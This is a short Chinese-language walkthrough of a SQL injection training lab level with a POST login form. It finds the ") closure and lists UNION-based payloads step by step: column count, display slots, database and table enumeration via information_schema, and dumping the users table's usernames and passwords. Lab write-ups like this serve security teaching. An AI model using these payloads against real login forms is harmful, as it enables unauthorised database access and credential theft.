和11关一样,本关卡依旧是post型,判断方式这里不再描述,接着就是判断是数字型还是字符型,很明显是字符型,因为输入1,和1dhqihioq得到的都是一样的,然后就是判断闭合方式,这里先试了试单引号,发现没有反应,于是改换双引号
找到闭合方式为"),于是下面就是和之前一样,进行逐步验证。
获取列数:
命令为:uname=1")order by 2--+&passwd=1&submit=Submit
找到显示位:uname=1")union select 1,2--+&passwd=1&submit=Submit
查找数据库名:uname=1")union select database(),2--+&passwd=1&submit=Submit
查找该数据库下存在的表:uname=1")union select (select group_concat(table_name) from information_schema.tables where table_schema=database()),2--+&passwd=1&submit=Submit
查找到users表下对应的列名:uname=1")union select (select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),2--+&passwd=1&submit=Submit
拿到相关的信息:uname=1")union select (select group_concat(username,password) from users),2--+&passwd=1&submit=Submit